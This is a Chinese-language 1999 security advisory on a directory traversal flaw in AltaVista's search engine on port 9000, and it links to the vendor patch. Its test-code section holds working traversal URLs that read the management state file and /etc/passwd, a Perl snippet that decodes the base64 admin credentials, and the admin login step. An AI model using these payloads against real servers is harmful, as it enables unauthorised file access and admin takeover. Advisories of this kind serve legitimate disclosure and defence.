AltaVista 的搜索引擎可以被旁路过发布时间:1999-12-29 更新时间:1999-12-29 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Misc详细描述 AltaVista的搜索引擎在web服务器的9000端口监听查询,起主要功能能在查询中接受一个单个的../字符串,提供对 http目录下的所有文档的访问,这些文档包括各种管理信息,包括远程管理工具的密码,这个密码是基于64位加密的,这密码可以很容易的恢复为明文并导致攻击者可以控制所有对搜索引擎的远程管理能力。 测试代码 http://target:9000/cgi-bin/query? mss=../logs/mgtstate (to get the mgtstate file.) #!/usr/bin/perl use MIME::Base64; print decode_base64("$ARGV[0]"), "\n"; (解密用户名和密码) http://target:9000/cgi-bin/mgt 输入密码和用户名访问远程管理系统。 或者 http://target:9000/cgi-bin/query?mss=%2e%2e%2f% 2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd 获得UNIX系统的密码文件。 解决方案 AltaVista提供了相应的补丁: http://doc.altavista.com/business_solutions/searc h_products/free_downloads/search_intranet.shtml 相关信息 |
